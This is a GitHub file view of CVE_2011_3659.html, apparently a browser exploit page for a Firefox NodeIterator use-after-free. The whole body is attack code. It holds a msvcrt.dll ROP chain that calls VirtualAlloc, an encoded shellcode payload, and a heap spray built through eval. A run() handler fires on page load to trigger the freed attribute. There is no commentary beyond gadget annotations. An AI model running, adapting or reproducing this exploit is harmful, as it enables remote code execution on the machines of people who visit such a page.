-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathCVE_2011_3659.html
123 lines (101 loc) · 4.79 KB
/
CVE_2011_3659.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
<html>
<head>
<meta http-equiv="refresh" content="3">
<body>
<script language='javascript'>
var rop = unescape("%uf50b%u7818"+
"%ue392%u77c1"+
"%u111d%u77be"+
"%uba0f%u77c0"+
"%uba0f%u77c0"+
"%u7705%u77c1"+
"%u0001%u0000"+
"%ucbf9%u77c1"+
"%u1000%u0000"+
"%u0b00%u77c1"+
"%u0040%u0000"+
"%u6100%u77c1"+
"%u6101%u77c1"+
"%ua18d%u77c0"+
"%uaacc%u77bf"+
"%u67f0%u77c2"+
"%u1025%u77c2");
// 0x77c0a891, # XCHG EAX,ESP # POP EBP # POP EBX # RETN [msvcrt.dll] stack flip
// 0x77c1e392, # POP EAX # RETN [msvcrt.dll]
// 0x77be111d, # ptr to &VirtualAlloc() (77be110c - EF on al = 77be111d)[IAT msvcrt.dll]
// 0x77c0ba0f, # POP EBP # RETN [msvcrt.dll]
// 0x77c0ba0f, # skip 4 bytes [msvcrt.dll]
// 0x77c17705, # POP EBX # RETN [msvcrt.dll]
// 0x00000001, # 0x00000001-> ebx
// 0x77c1cbf9, # POP EDX # RETN [msvcrt.dll]
// 0x00001000, # 0x00001000-> edx
// 0x77c10b00, # POP ECX # RETN [msvcrt.dll]
// 0x00000040, # 0x00000040-> ecx
// 0x77c16100, # POP EDI # RETN [msvcrt.dll]
// 0x77c16101, # RETN (ROP NOP) [msvcrt.dll]
// 0x77c0a18d, # POP ESI # RETN [msvcrt.dll]
// 0x77bfaacc, # JMP [EAX] [msvcrt.dll]
// 0x77c267f0, # PUSHAD # ADD AL,0EF # RETN [msvcrt.dll]
// 0x77c21025, # ptr to 'push esp # ret ' [msvcrt.dll]
var payload = unescape("%uc481%ufa24%uffff%uc7ba%u1c16%udadd%ud9cc%u2474"+
"%u58f4%uc92b%u33b1%ue883%u31fc%u0e50%u9703%ufe18"+
"%ueb28%u77cd%u13d2%ue80e%uf65a%u3a3f%u7338%u8a6d"+
"%ud14a%u619e%uc11e%u0715%ue6b7%ua29e%uc9e1%u031f"+
"%u852e%u05dc%ud7d2%ue630%u18eb%ue745%u442c%ub5a6"+
"%u03e5%u2a15%u5181%u4ba6%ude45%u3396%u20e0%u8e62"+
"%u70eb%u85db%u68a4%uc157%u8914%u11b4%uc068%ue2b1"+
"%ud31a%u3b13%ue2e2%u905b%ucbdd%ue851%ueb1a%u9f89"+
"%u0850%u9837%u73a2%u2de3%ud337%u9560%ue293%u40a5"+
"%ue857%u0602%uec3f%ucb95%u084b%uea1d%u999b%uc965"+
"%uc23f%u703e%uae19%u8d91%u1679%u284d%ub4f1%u4a9a"+
"%ud258%ude5d%u9be6%ue05e%u8be8%ud136%u4463%uee40"+
"%u21a1%ua4be%u03e8%u6157%u1679%u923a%u5457%u1143"+
"%u2452%u09b0%u2117%u8dfc%u5bcb%u786d%uc8ec%ua98e"+
"%u8f8f%u311c%u2a7e%ud0a5%u417e");
var offset_length = 1542;
for (var i=0; i < 0x320; i++)
{
var random1=Math.floor(Math.random()*90)+10;
var random2=Math.floor(Math.random()*90)+10;
var random3=Math.floor(Math.random()*90)+10;
var random4=Math.floor(Math.random()*90)+10;
var paddingstr = "%u" + random1.toString() + random2.toString();
paddingstr += "%u" + random3.toString() + random4.toString();
var padding = unescape(paddingstr);
while (padding.length < 0x1000) padding+= padding;
junk_offset = padding.substring(0, offset_length);
var single_sprayblock = junk_offset + rop + payload;
single_sprayblock += padding.substring(0,0x800 - offset_length - rop.length - payload.length);
while (single_sprayblock.length < 262144) single_sprayblock += single_sprayblock;
sprayblock = single_sprayblock.substring(0, (262144-6)/2);
varname = "var" + random1.toString() + random2.toString();
varname += random3.toString() + random4.toString() + i.toString();
thisvar = "var " + varname + "= '" + sprayblock +"';";
eval(thisvar);
}
function run() {
var attr = document.createAttribute("foo");
attr.value = "bar";
var ni = document.createNodeIterator(
attr, NodeFilter.SHOW_ALL,
{acceptNode: function(node) { return NodeFilter.FILTER_ACCEPT; }},
false);
ni.nextNode();
ni.nextNode();
ni.previousNode();
attr.value = null;
const addr = unescape("%u5a48%u4344");//filler junk
var container = new Array();
var small = unescape("%u0c0c%u0c0c%u0c0c%u0c0c%u278e%u77c2%u0c10%u0c0c"); //0x77c2278e # POP ESP # RETN [msvcrt.dll]
while (small.length != 30)
small += addr;
for (i = 0; i < 1024*1024*2; ++i)
container.push(unescape(small));
ni.referenceNode;
}
</script>
</head>
<body onload="run();">
</svg>
</body>
</html>